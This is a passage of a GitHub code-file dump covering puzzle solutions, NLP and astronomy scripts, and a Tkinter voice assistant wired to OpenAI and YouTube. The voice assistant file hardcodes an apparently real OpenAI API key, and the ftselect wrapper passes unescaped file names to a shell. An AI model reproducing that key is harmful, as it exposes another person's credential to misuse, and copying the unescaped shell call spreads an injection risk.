4][0]\n\t\t\tposition[1] += directions[dir_change_count % 4][1]\n\n\t\t\t# Use the dictionary to determine the new position's number\n\t\t\tpos_num = 0\n\t\t\tfor i in range(-1, 2):\n\t\t\t\tfor j in range(-1, 2):\n\t\t\t\t\ttemp_pos = position.copy()\n\t\t\t\t\ttemp_pos[0] += i\n\t\t\t\t\ttemp_pos[1] += j\n\t\t\t\t\tpos_num += spiral_dict.get(tuple(temp_pos), 0)\n\n\t\t\t# Map the new position to the new position number in the dictionary\n\t\t\tspiral_dict[tuple(position)] = pos_num\n\n\t\t# Turn to the next direction\n\t\tdir_change_count += 1\n\n\t# Return this pos_num (it is the largest after the target_num)\n\treturn pos_num\n\n\ndef main():\n\t# Get the number\n\ttarget_num = int(open(\"input.txt\").readline())\n\n\t# Print the results\n\tprint(\"Part one: \", part_one(target_num))\n\tprint(\"Part two: \", part_two(target_num))\n\n\nclass Day3Tests(unittest.TestCase):\n\tdef test_part_one(self):\n\t\tinputs = [\t1, 3, 6, 10]\n\t\toutputs = [\t0, 2, 1, 3]\n\t\tfor i in range(0, len(inputs)):\n\t\t\tself.assertEqual(outputs[i], part_one(inputs[i]))\n\n\tdef test_part_two(self):\n\t\tinputs = [\t1, 2, 23, 147]\n\t\toutputs = [\t2, 4, 25, 304]\n\t\tfor i in range(0, len(inputs)):\n\t\t\tself.assertEqual(outputs[i], part_two(inputs[i]))\n\n\nif (__name__ == \"__main__\"):\n\tmain()\n\tunittest.main()\n\n","repo_name":"paulbarmstrong/advent-of-code-2017-solutions","sub_path":"Day3/Day3.py","file_name":"Day3.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33943789600","text":"# Read pdf.\n\nfrom pathlib import Path\n\nfrom PyPDF2 import PdfReader\n\n\ndef read():\n pdf = Path('source/1110210.pdf')\n reader = PdfReader(pdf)\n for page in reader.pages:\n text = page.extract_text()\n print(text)\n\n\nif __name__ == '__main__':\n read()\n","repo_name":"FWcloud916/tw-boating-exam-convert","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27506130027","text":"import internal_config\nfrom gensim.models import word2vec\nfrom database import mongodb_client\nfrom pymongo import DeleteOne\nimport requests\n\n\nPOLARITY_UNK = internal_config.polarity_unk\nPU_KEEP = internal_config.keep_p\nPU_pattern = internal_config.PU_pattern\nPU = internal_config.PU\nWORD2VEC_URL = internal_config.WORD2VEC_URL\n\n\nclass Resources_data:\n def __init__(self, *args):\n pass\n\n\ndef load_resources(domain):\n \"\"\"\"\"\"\n resources_data = Resources_data()\n \"\"\"加载分词,词性,依存\"\"\"\n documents = mongodb_client.db['comments'].find({'domain': domain})\n seg_list = []\n pos_list = []\n \"\"\"这里doc['seg']是string,下面还要按空格分隔\"\"\"\n for idx, doc in enumerate(documents):\n seg_list.append(doc['seg'].split(' '))\n pos_list.append(doc['pos'].split(' '))\n\n \"\"\"加载按标点符号分隔的分词,词性\"\"\"\n seg_pu_list, pos_pu_list = _split_by_pu(seg_list, pos_list)\n\n \"\"\"加载第三方情感词典\"\"\"\n general_opinion_doc = mongodb_client.db['opinion_resources'].find_one({'doc_type': 'general_opinion'})\n general_opinion = general_opinion_doc['lexicon']\n\n \"\"\"加载停用词表\"\"\"\n stopwords = []\n stopwords_docs = mongodb_client.db['opinion_resources'].find({'doc_type': 'stopwords'})\n for doc in stopwords_docs:\n for word in doc['lexicon']:\n stopwords.append(word)\n\n \"\"\"加载用户定义词典\"\"\"\n user_defined_aspect = []\n udf_doc = mongodb_client.db['opinion_resources'].find_one({'doc_type': 'product_tag', 'domain': domain})\n for word in udf_doc['lexicon']:\n user_defined_aspect.append(word)\n \"\"\"加载word2vec模型\"\"\"\n word2vec_model = load_word2vec_model()\n\n resources_data.seg_list = seg_list\n resources_data.seg_pu_list = seg_pu_list\n resources_data.pos_list = pos_list\n resources_data.pos_pu_list = pos_pu_list\n resources_data.general_opinion = general_opinion\n resources_data.stopwords = stopwords\n resources_data.user_defined_aspect = user_defined_aspect\n resources_data.word2vec_model = word2vec_model\n\n return resources_data\n\n\ndef _split_by_pu(seg_list, pos_list):\n \"\"\"将每条评论的分词和词性标注结果按照标点符号分割,每行是一个短句,重新写入一个文件\"\"\"\n seg_pu_list = []\n pos_pu_list = []\n for x, word_line in enumerate(seg_list):\n start_idx = 0\n no_error = True\n for y, word in enumerate(word_line):\n if word in PU_KEEP and pos_list[x][y] in PU:\n end_idx = y\n seg_pu_list.append(word_line[start_idx: end_idx])\n pos_pu_list.append(pos_list[x][start_idx: end_idx])\n start_idx = y + 1\n elif word in PU_KEEP and pos_list[x][y] not in PU:\n no_error = False\n else:\n continue\n else:\n if start_idx != len(word_line) and no_error:\n seg_pu_list.append(word_line[start_idx:])\n pos_pu_list.append(pos_list[x][start_idx:])\n return seg_pu_list, pos_pu_list\n\n\ndef load_word2vec_model():\n r = requests.get(WORD2VEC_URL)\n with open('word2vec.model', 'wb') as f:\n f.write(r.content)\n model = word2vec.Word2Vec.load(\"word2vec.model\")\n return model\n\n","repo_name":"zhuwenbo1988/nlp","sub_path":"opinion_mining/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28328869300","text":"import csv\r\nimport math\r\nimport sys\r\nimport gc\r\nimport numpy as np\r\nfrom itertools import combinations\r\npaircsv=[]\r\npairlist=[]\r\nwith open('pair.csv')as f:\r\n f_csv = csv.reader(f)\r\n for row in f_csv:\r\n paircsv.append(row)\r\n\r\ncombin=np.linspace(2, len(paircsv)-1, len(paircsv)-1-1, endpoint=True, retstep=False, dtype=None)\r\nfor i in range(2,len(paircsv)):\r\n for j in range(i+1,len(paircsv)):\r\n ra1=float(paircsv[i][1])\r\n ra2=float(paircsv[j][1])\r\n dec1=float(paircsv[i][2])\r\n dec2=float(paircsv[j][2])\r\n redshift1=float(paircsv[i][4])\r\n redshift2=float(paircsv[j][4])\r\n d1=299792.458*redshift1*1000000/67.8\r\n d2=299792.458*redshift2*1000000/67.8\r\n maxd=max(d1,d2)\r\n cosA=math.cos(dec1*math.pi/180)*math.cos(dec2*math.pi/180)+math.sin(dec1*math.pi/180)*math.sin(dec2*math.pi/180)*math.cos((ra1-ra2)*math.pi/180)\r\n if cosA >1 :\r\n touying=0\r\n elif cosA <-1:\r\n touying=maxd*math.pi\r\n else:\r\n touying=maxd*math.acos(cosA)\r\n deltaz=abs(((1+redshift1)**2-1)/(1+(1+redshift1)**2)-((1+redshift2)**2-1)/(1+(1+redshift2)**2))*299792.458\r\n if touying < 200000 and deltaz < 500 and paircsv[i][0] != paircsv[j][0]:\r\n pairlist.append([min(paircsv[i][0],paircsv[j][0]),max(paircsv[i][0],paircsv[j][0])])\r\n gc.collect()\r\n if i % 50 ==0:\r\n print(i/len(combin))\r\n \r\n\r\nheaders = ['objid1','objid2']\r\nwith open('newpair.csv','w',newline='')as f:\r\n f_csv = csv.writer(f)\r\n f_csv.writerow(headers)\r\n f_csv.writerows(pairlist)\r\n f.close()\r\n\r\n\r\n\r\n","repo_name":"chen-yr18/SFRandAM","sub_path":"newpair.py","file_name":"newpair.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4519899799","text":"import sys\n\n\ndef calculate_mass_of_berries(first_with_berries, second_with_berries,\n first_without_berries, second_without_berries):\n \"\"\"\n\n :param first_with_berries: Weight of the first mathematician's basket with berries\n :param second_with_berries: Weight of the second mathematician's basket with berries\n :param first_without_berries: Weight of the first mathematician's basket without berries\n :param second_without_berries: Weight of the second mathematician's basket without berries\n :type first_with_berries: int\n :type second_with_berries: int\n :type first_without_berries: int\n :type second_without_berries: int\n :return: Mass of berries picked by first mathematician and the second separated with space\n :rtype str\n \"\"\"\n first_berry_mass = first_with_berries - first_without_berries\n second_berry_mass = second_with_berries - second_without_berries\n return str(first_berry_mass) + \" \" + str(second_berry_mass)\n\n\n# Read all lines\nfirst_line = sys.stdin.readline()\nsecond_line = sys.stdin.readline()\nthird_line = sys.stdin.readline()\n\n# Split all lines\nsplit_first_line = first_line.split()\nsplit_second_line = second_line.split()\nsplit_third_line = third_line.split()\n\n# Get numbers\nnum1 = int(split_first_line[0])\nnum2 = int(split_first_line[1])\nnum3 = int(split_third_line[0])\nnum4 = int(split_second_line[1])\n\n# Print the solution\nprint(calculate_mass_of_berries(num1, num2, num3, num4))\n","repo_name":"hovteamable/timus-py3","sub_path":"Mathematicians and Berries(2001).py","file_name":"Mathematicians and Berries(2001).py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33131170109","text":"class Solution(object):\n def numJewelsInStones(self, J, S):\n \"\"\"\n :type J: str\n :type S: str\n :rtype: int\n \"\"\"\n sum = 0\n for c in S:\n if c in J:\n sum+=1\n return sum\n\ns = Solution()\nprint(s.numJewelsInStones(\"aA\",\"aAAbbbb\"))\n\nprint([i in \"aA\" for i in \"aAAbbb\"])\n\nprint([i in \"a\" for i in \"aAAbbb\"])\n\nJ = \"aA\"\nS = \"AAaajjj\"\n\ns = map(J.count,S)\nprint(s)\nprint(list(s))\n\nJ.count()\n\n","repo_name":"shen-ee/LC","sub_path":"code/771.py","file_name":"771.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29342087391","text":"# -*- coding: utf-8 -*-\nimport xml.etree.cElementTree as ET\nparser = ET.XMLParser(encoding=\"utf-8\")\ntree = ET.parse('fh.xml', parser=parser)\nroot = tree.getroot()\nspisok = {}\nname = ''\nfor elem in root:\n for subelem in elem:\n for subsubelem in subelem:\n if subsubelem.text!= None:\n if len(subsubelem.text)> 12 and subsubelem.text[:4]!=\"3743\":# and subsubelem.text[:-1]!=\".\":\n name = subsubelem.text\n elif len(subsubelem.text)==3 and subsubelem.text!='SIP' and subsubelem.text[-1]!='.':\n spisok[name] = subsubelem.text\n\nprint(spisok)\n\ncontacts = ET.Element('contacts')\ni=0\nfor key,val in spisok.items():\n i+=1\n contact = ET.SubElement(contacts, 'contact')\n contact.set(\"number\",str(i))\n contact.set(\"name\", key)\n contact.set(\"firstname\", '')\n contact.set(\"lastname\", '')\n contact.set(\"phone\", val)\n contact.set(\"mobile\", '')\n contact.set(\"email\", '')\n contact.set(\"address\", '')\n contact.set(\"city\", '')\n contact.set(\"state\", '')\n contact.set(\"zip\", '')\n contact.set(\"comment\", '')\n contact.set(\"presence\", '')\n contact.set(\"info\", '')\nappt = open('appt.xml','w',encoding=\"utf-8\")\nstrET = ET.tostring(contacts,encoding=\"utf-8\")\nstrET= strET.decode(encoding=\"utf-8\", errors=\"strict\")\nappt.write(strET)\n","repo_name":"Rammbest/TKServis","sub_path":"XML_contact.py","file_name":"XML_contact.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28959970025","text":"def reverse(list):\r\n c=[]\r\n for l in reversed(list) :\r\n c.append(l)\r\n\r\n return c\r\n# m = [1,2,3,4,5]\r\n# print(reverse(m))\r\nlst =[]\r\nu = int(input('enter no. of elements'))\r\n\r\nprint('enter list items')\r\nfor n in range(0,u):\r\n ele = int(input())\r\n lst.append(ele)\r\nprint(reverse(lst))","repo_name":"vansh45/vvizard","sub_path":"codes/DSA 2023/4_reverse.py","file_name":"4_reverse.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23712412267","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom tkinter.ttk import Combobox\nimport pyttsx3\nimport os\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport pywhatkit as pwt\nimport openai\nimport pyttsx3\nimport speech_recognition as sr\nimport datetime\nimport wikipedia\nimport webbrowser\nimport os\nimport time\nimport googletrans\nimport speech_recognition\nimport gtts\nimport playsound\n\n\nroot = Tk()\nroot.title(\"Debuggers\")\nroot.geometry(\"900x450+200+200\")\nroot.resizable(False,False)\nroot.configure(bg=\"#3e8187\")\n\ndef yt():\n recognizer = speech_recognition.Recognizer()\n with speech_recognition.Microphone() as source:\n print(\"speak now\")\n voice = recognizer.listen(source,0,8)\n text = recognizer.recognize_google(voice,language=\"hi\")\n print(text)\n # print(googletrans.LANGUAGES)\n translator = googletrans.Translator()\n translation = translator.translate(text,dest=\"en\")\n # print(translation.text)\n a = translation.text\n print(a)\n pwt.playonyt(a)\n\n \n\ndef cg():\n recognizer = speech_recognition.Recognizer()\n with speech_recognition.Microphone() as source:\n print(\"speak now\")\n voice = recognizer.listen(source,0,8)\n text = recognizer.recognize_google(voice,language=\"hi\")\n print(text)\n # print(googletrans.LANGUAGES)\n translator = googletrans.Translator()\n translation = translator.translate(text,dest=\"en\")\n # print(translation.text)\n a = translation.text\n print(a)\n converted_audio = gtts.gTTS(translation.text, lang=\"en\")\n # converted_audio.save(\"chatgpt.mp3\")\n # playsound.playsound(\"hello.mp3\")\n # music_dir = 'D:\\\\Jarvis Voice Assistant'\n # songs = os.listdir(music_dir)\n # print(songs)\n # os.startfile(os.path.join(music_dir, songs[7]))\n\n engine = pyttsx3.init('sapi5')\n voices = engine.getProperty('voices')\n # print(voices[1].id)\n engine.setProperty('voice', voices[0].id)\n\n def speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\n\n openai.api_key=\"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\"\n\n model_engine = \"text-davinci-003\"\n prompt = a\n\n completion = openai.Completion.create(\n engine = model_engine,\n prompt = prompt,\n max_tokens = 1024,\n n =1,\n stop = None,\n temperature = 0.5,\n )\n\n response = completion.choices[0].text\n print(response)\n # speak(response)\n\n # print(googletrans.LANGUAGES)\n translator = googletrans.Translator()\n translation = translator.translate(response,dest=\"hi\")\n print(translation.text)\n converted_audio = gtts.gTTS(translation.text, lang=\"hi\")\n converted_audio.save(\"chatgpt.mp3\")\n # playsound.playsound(\"hello.mp3\")\n music_dir = 'C:\\\\Users\\\\jaiam\\\\OneDrive\\\\Desktop\\\\New folder (4)\\\\Speech_Recoginition'\n songs = os.listdir(music_dir)\n # print(songs)\n os.startfile(os.path.join(music_dir, songs[4]))\n\ndef sleep():\n # speak(\"I am going for a sleep\")\n time.sleep(60)\n\n\n\n\n#icon\nimage_icon=PhotoImage(file=\"speaker logo.png\")\nroot.iconphoto(False,image_icon)\n\n# Top Frame\nTop_frame = Frame(root,bg=\"#154c79\", width=900, height=100)\nTop_frame.place(x=0,y=0)\n\n\nLabel(Top_frame,text=\"Time pass\", font=\"arial 36 bold\", bg=\"#154c79\", fg=\"white\").place(x=350,y=20)\n\n\n################\nTop_frame = Frame(root,bg=\"#2e2e2d\", width=250, height=500)\nTop_frame.place(x=0,y=100)\n\nbtn=Button(root,text=\"YT\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=yt)\nbtn.place(x=400,y=160)\nbtn2=Button(root,text=\"CG\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=cg)\nbtn2.place(x=650,y=160)\nbtn3=Button(root,text=\"Sleep\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=sleep)\nbtn3.place(x=400,y=280)\nbtn4=Button(root,text=\"Exit\", width=10, font=\"arial 14 bold\", bg=\"#39c790\",command=root.destroy)\nbtn4.pack()\nbtn4.place(x=650,y=280)\n\n\nroot.mainloop()\n","repo_name":"yogendra-saini/Speech-Recognition","sub_path":"youtube1.py","file_name":"youtube1.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70223136693","text":"import argparse\nimport logging\nimport re\nimport string\n\nimport gensim\nimport numpy as np\nimport json\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n\nPUNCT_RE = re.compile(r'[^\\w\\s]+$')\ndef is_punct(string):\n return PUNCT_RE.match(string) is not None\n\nft_home = '/home/folgert/local/fastText-0.1.0/fasttext'\n\ndef load_data(fpath):\n logging.info(\"Loading dataset... {}\".format(fpath))\n lines = [] \n for line in open(fpath):\n song = json.loads(line.strip())\n for verse in song['text']:\n for line in verse:\n words = []\n n_words = len(line)\n for i, word in enumerate(line):\n token = word.get('token', word.get('word'))\n if not is_punct(token):\n syllables = []\n for j, syllable in enumerate(word['syllables']):\n if len(word['syllables']) > 1:\n if j == 0:\n syllable = syllable + '-'\n elif j == (len(word['syllables']) - 1):\n syllable = '-' + syllable\n else:\n syllable = '-' + syllable + '-'\n words.append(syllable.lower())\n lines.append(words)\n logging.info(\"Loading done!\")\n return lines\n\n\ndef train_model(data, output, min_count, dim, window, workers, model):\n sg = 1 if model == 'skipgram' else 0\n if model == 'fasttext':\n model = gensim.models.FastText(size=dim, window=window, workers=workers, min_count=min_count)\n model.build_vocab(data)\n model.train(data, total_examples=model.corpus_count, epochs=10)\n else:\n model = gensim.models.Word2Vec(\n data, min_count=min_count, size=dim, window=window, workers=workers, sg=sg)\n model.wv.save(output)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--training_files\", nargs='+')\n parser.add_argument(\"--output_file\")\n parser.add_argument(\"--dim\", default=300, type=int)\n parser.add_argument(\"--window\", default=5, type=int)\n parser.add_argument(\"--model\", default=\"cbow\", choices=('skipgram', 'cbow', 'fasttext'))\n parser.add_argument(\"--workers\", default=4)\n parser.add_argument(\"--min_count\", default=5, type=int)\n args = parser.parse_args()\n\n lines = []\n for file in args.training_files:\n lines.extend(load_data(file))\n train_model(lines, args.output_file, args.min_count, args.dim,\n args.window, args.workers, args.model)\n\n","repo_name":"fbkarsdorp/deepflow","sub_path":"preprocess/train_syllable_embeddings.py","file_name":"train_syllable_embeddings.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31738046092","text":"\nimport os\nimport subprocess\nfrom nicerlab.ftools.ftutils import *\n \ndef ftselect( inputfile, outputfile, expression, ext=1, copyall=True, clobber=False):\n \"\"\"\n Calls ftselect in a subprocess. Returns the outputfile name on success and\n raises an error on failure.\n\n Parameters\n ----------\n inputfile: string\n Filename of the input fits table\n\n outputfile: string\n Filename of the output fits table\n\n expression: string\n Ftools style rowfilter expression. See\n https://heasarc.gsfc.nasa.gov/lheasoft/ftools/headas/rowfilter.html\n for detailed instructions.\n\n clobber: bool\n Overwrite flag. Default is False, meaning existing output will **not**\n be overwritten.\n\n ext: object\n Fits extension to filter. Takes the HDU name or index. Default is 1.\n\n \"\"\"\n\n if (os.path.exists(outputfile) and clobber==False):\n return outputfile\n \n # Copy the use environment\n my_env = os.environ.copy()\n my_env[\"HEADASPROMPT\"] = \"/dev/null\"\n \n # Construct the command\n cmd = \"ftselect '{0}[{1}]' {2} '{3}' copyall={4} clobber={5}\".format(\n inputfile, ext, outputfile, expression, \n clobber_str(copyall), clobber_str(clobber) \n )\n\n # Execute and get output\n p = subprocess.Popen(cmd, shell=True, env=my_env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if (p.wait() == 0):\n return outputfile\n else:\n # Read from the stdout \n message = p.stderr.read()\n raise FtoolsError(p.wait(), cmd, message)\n\n","repo_name":"peterbult/nicerlab","sub_path":"nicerlab/ftools/ftselect.py","file_name":"ftselect.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3708628071","text":"from typing import Optional, List\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:\n dummy = ListNode(None, head)\n prev = dummy\n while head and head.next:\n next = head.next\n prev.next = next\n next.next, head.next = head, next.next\n prev = head\n head = head.next\n return dummy.next\n\n\ndef array_to_list(list: List) -> ListNode:\n item = None\n for v in list[::-1]:\n item = ListNode(v, item)\n return item\n\n\ndef print_list(head: ListNode):\n while head is not None:\n print(head.val, end=\" \")\n head = head.next\n print()\n\n\ntest = Solution()\nprint_list(test.swapPairs(array_to_list([1, 2, 3, 4])))\nprint_list(test.swapPairs(array_to_list([1])))\nprint_list(test.swapPairs(array_to_list([])))\nprint_list(test.swapPairs(array_to_list([1, 2, 3, 4, 5])))\n","repo_name":"dmp2016/LeetCode","sub_path":"Swap Nodes in Pairs.py","file_name":"Swap Nodes in Pairs.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11681451912","text":"import uuid\nfrom enum import Enum\n\nfrom pydantic import BaseModel, Field, validator\n\n\nclass Issuer(Enum):\n visa = 'visa'\n mastercard = 'mastercard'\n\n\nclass MockedCard(BaseModel):\n id: str = Field(default_factory=uuid.uuid4, alias=\"_id\")\n pan: str = Field(...)\n expiration_date: str = Field(regex=r\"(1[0-2]|0[1-9]|\\d)/(2[3-9]|[3-9]\\d)\")\n cardholder_name: str = Field(...)\n issuer: Issuer = Field(default=\"visa\")\n\n def __eq__(self, other):\n if isinstance(other, MockedCard):\n print(f\"equals {self.issuer} == {other.issuer}\")\n return self.id == other.id or (\n self.pan == other.pan and\n self.expiration_date == other.expiration_date and\n self.cardholder_name == other.cardholder_name and\n self.issuer == other.issuer\n )\n return False\n\n class Config:\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"pan\": \"4242424242424242\",\n \"expiration_date\": \"12/24\",\n \"cardholder_name\": \"Lionel Messi\",\n \"issuer\": \"visa\",\n }\n }\n\n\nclass MockedCardRequestBody(BaseModel):\n expiration_date: str = Field(regex=r\"(1[0-2]|0[1-9]|\\d)/(2[3-9]|[3-9]\\d)\")\n cardholder_name: str = Field(...)\n issuer: str = Field(default=\"visa\")\n\n class Config:\n schema_extra = {\n \"example\": {\n \"expiration_date\": \"12/24\",\n \"cardholder_name\": \"Lionel Messi\",\n \"issuer\": \"visa\",\n }\n }\n","repo_name":"ecofood-tdp1/back","sub_path":"app/models/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30587939200","text":"#!/usr/bin/env python3\n\nclass Panda_code:\n def __init__(self, functor, functor_id) -> None:\n self.functor = functor\n self.functor_id = functor_id\n @staticmethod\n def import_libs():\n return f\"\"\"\nfrom pandaUtil_mysql_chain import mysql_chain\nfrom pandaUtil_append import chunk_append,readMysql\n \"\"\".strip()\n\n @property\n def code(self):\n method = self.functor.__class__.__name__\n return getattr(self, method)()\n\n def readMysql(self):\n base_data = self.functor.base_data\n # param = self.functor.code_param\n # 'table_info': {'table_schema': 'db_aliyun', 'table_name': 'sy_cd_ms_sh_gs_shlist_new', 'table_comment': '工商股东表', 'table_catalog': 'def', 'table_rows': 0, 'avg_row_length': 0}\n print('base_data', base_data)\n db_name = base_data['table_info']['table_schema']\n tb_name = base_data['table_info']['table_name']\n tb_cn_name = base_data['table_info']['table_comment']\n \n base_field_list = base_data['field_list'][1:]\n base_comment_list = base_data['comment_list'][1:]\n select_list = base_data['select_list'][1:]\n select_field_list = \",\".join([\n field\n for i,field in enumerate(base_field_list)\n if select_list[i]==True\n ])\n select_comment_list = ','.join([\n commend\n for i,commend in enumerate(base_comment_list)\n if select_list[i]==True\n \n ])\n cond_list = ','.join([\n cond\n for cond in base_data['cond_list']\n if cond.strip() != ''\n ])\n # print('readMysql:parse', param)\n r = f\"\"\"\ndef f_root():\n \"{self.functor.__class__.__name__}\"\n # {tb_cn_name}\n # {select_comment_list}\n for chunk in readMysql(mysql_chain.{db_name})[\n \"{tb_name}\",\n \"{select_field_list}\",\n \"{cond_list}\",\n ].df_chunks:\n yield chunk\n \"\"\".strip()\n return r\n \n def colAppend(self):\n base_data = self.functor.base_data\n print('base_data', base_data)\n db_name = base_data['table_info']['table_schema']\n tb_name = base_data['table_info']['table_name']\n tb_cn_name = base_data['table_info']['table_comment']\n \n base_field_list = base_data['field_list'][1:]\n base_comment_list = base_data['comment_list'][1:]\n select_list = base_data['select_list'][1:]\n key_list = base_data['key_list'][1:]\n select_field_list = \",\".join([\n field\n for i,field in enumerate(base_field_list)\n if select_list[i]==True\n ])\n select_comment_list = ','.join([\n commend\n for i,commend in enumerate(base_comment_list)\n if select_list[i]==True\n \n ])\n cond_list = ','.join([\n cond\n for cond in base_data['cond_list']\n if cond.strip() != ''\n ])\n # def chunk_append(root_chunk, append_info, key, key_type=str):\n key_type = 'str'\n # append_key_list = [\n # field\n # for i,field in enumerate(base_field_list)\n # if key_list[i]==True\n # ]\n # append_key = ''\n # if len(append_key_list)>0:\n # append_key = append_key_list[0]\n append_key = base_data.get('append_key', '')\n root_key = base_data.get('prev_root_key', '')\n\n r = f\"\"\"\ndef f{self.functor_id}(chunk):\n \"{self.functor.__class__.__name__}\"\n # {tb_cn_name}\n # {select_comment_list}\n root_key,append_key = {root_key},{append_key}\n new_chunk = chunk_append(chunk, append_info=[\n mysql_chain.{db_name},\n \"{tb_name}\",\n \"{select_field_list}\",\n \"{cond_list}\",\n ], key=[\n root_key,append_key\n ], key_type={key_type})\n return new_chunk\n \"\"\".strip()\n return r\n \n def saveExcel(self):\n r = f\"\"\"\ndef f_save(df):\n \"{self.functor.__class__.__name__}\"\n print('save.df', df)\n \"\"\".strip()\n return r\n\n\n\n","repo_name":"ChrisChenD/module_creator","sub_path":"plan_flask/module/code_maker/hide/panda_code.py","file_name":"panda_code.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6066526059","text":"from collections import deque\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\ndef bfs(place, x, y, visited):\n result = 1\n visited[x][y] = True\n\n # 깊이 정보도 같이 담는다\n queue = deque([[(x, y), 0]])\n while queue:\n v, depth = queue.popleft()\n depth += 1\n if depth > 2: break\n for i in range(4):\n nx = v[0] + dx[i]\n ny = v[1] + dy[i]\n if 0<=nx Optional[ListNode]:\n \"\"\"\n Runtime: 36 ms, faster than 58.14% of Python3 online submissions for Middle of the Linked List.\n Memory Usage: 13.8 MB, less than 83.82% of Python3 online submissions for Middle of the Linked List.\n \"\"\"\n n = 1\n node = head\n\n while node.next:\n node = node.next\n n += 1\n\n midpoint = n // 2\n node = head\n for _ in range(midpoint):\n node = node.next\n\n return node\n","repo_name":"IAjimi/Leetcode","sub_path":"876_Middle_of_Linked_List.py","file_name":"876_Middle_of_Linked_List.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4643050774","text":"from torch.utils.data import Dataset\nfrom datasets import load_dataset\n\nclass MyDataset(Dataset):\n type = 0\n def __init__(self, split):\n self.dataset = load_dataset(path=\"csv\", data_files=f\"./data/{split}.csv\", split=\"train\")\n if split =='train':\n type = 0\n else:\n type = 1\n def __len__(self):\n return len(self.dataset)\n def maxlen(self):\n maxlen = 0\n for i in self.dataset:\n if len(i['text']) > maxlen:\n maxlen = len(i['text'])\n return maxlen\n def __getitem__(self, item):\n text = self.dataset[item][\"text\"]\n label = self.dataset[item][\"class\"]\n return text, label\n\n\n\n\nif __name__ == '__main__':\n dataset = MyDataset(\"train\")\n print(dataset.type)\n # 最长196\n for i,(text,label) in enumerate(dataset):\n print(label)\n\n\n\n\n\n\n\n","repo_name":"nonames819/NER-Affection","sub_path":"NER&Affection/baidu_classify/MyData.py","file_name":"MyData.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6226158641","text":"import torch\nimport random\nimport numpy as np\nfrom transformers import BertTokenizer\nfrom torchtext import data\nfrom text_classification.train_data import *\nfrom transformers import BertTokenizer, BertModel\nfrom model.BERTModel import BERTModel\nfrom output.train_model import *\nimport torch.optim as optim\nimport torch.nn as nn\nfrom collections import defaultdict\nimport pandas as pd\n\nbert = BertModel.from_pretrained('bert-base-uncased')\nBATCH_SIZE = 128\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased') \nmax_input_length = tokenizer.max_model_input_sizes['bert-base-uncased']\ninit_token_idx = tokenizer.cls_token_id\neos_token_idx = tokenizer.sep_token_id\npad_token_idx = tokenizer.pad_token_id\nunk_token_idx = tokenizer.unk_token_id\n\n#model need\nHIDDEN_DIM = 256\nOUTPUT_DIM = 1\nN_LAYERS = 2\nBIDIRECTIONAL = True\nDROPOUT = 0.25\ndevice = torch.device('cpu')\n\n\ndef tokenize_and_cut(sentence):\n tokens = tokenizer.tokenize(sentence) \n tokens = tokens[:max_input_length-2]\n return tokens\n \nclass Model_trainer:\n SEED = 1234\n random.seed(SEED)\n np.random.seed(SEED)\n torch.manual_seed(SEED)\n torch.backends.cudnn.deterministic = True\n TEXT = data.Field(batch_first = True,\n use_vocab = False,\n tokenize = tokenize_and_cut,\n preprocessing = tokenizer.convert_tokens_to_ids,\n init_token = init_token_idx,\n eos_token = eos_token_idx,\n pad_token = pad_token_idx,\n unk_token = unk_token_idx)\n\n LABEL = data.LabelField(dtype = torch.float)\n fields = [(None, None),('text', 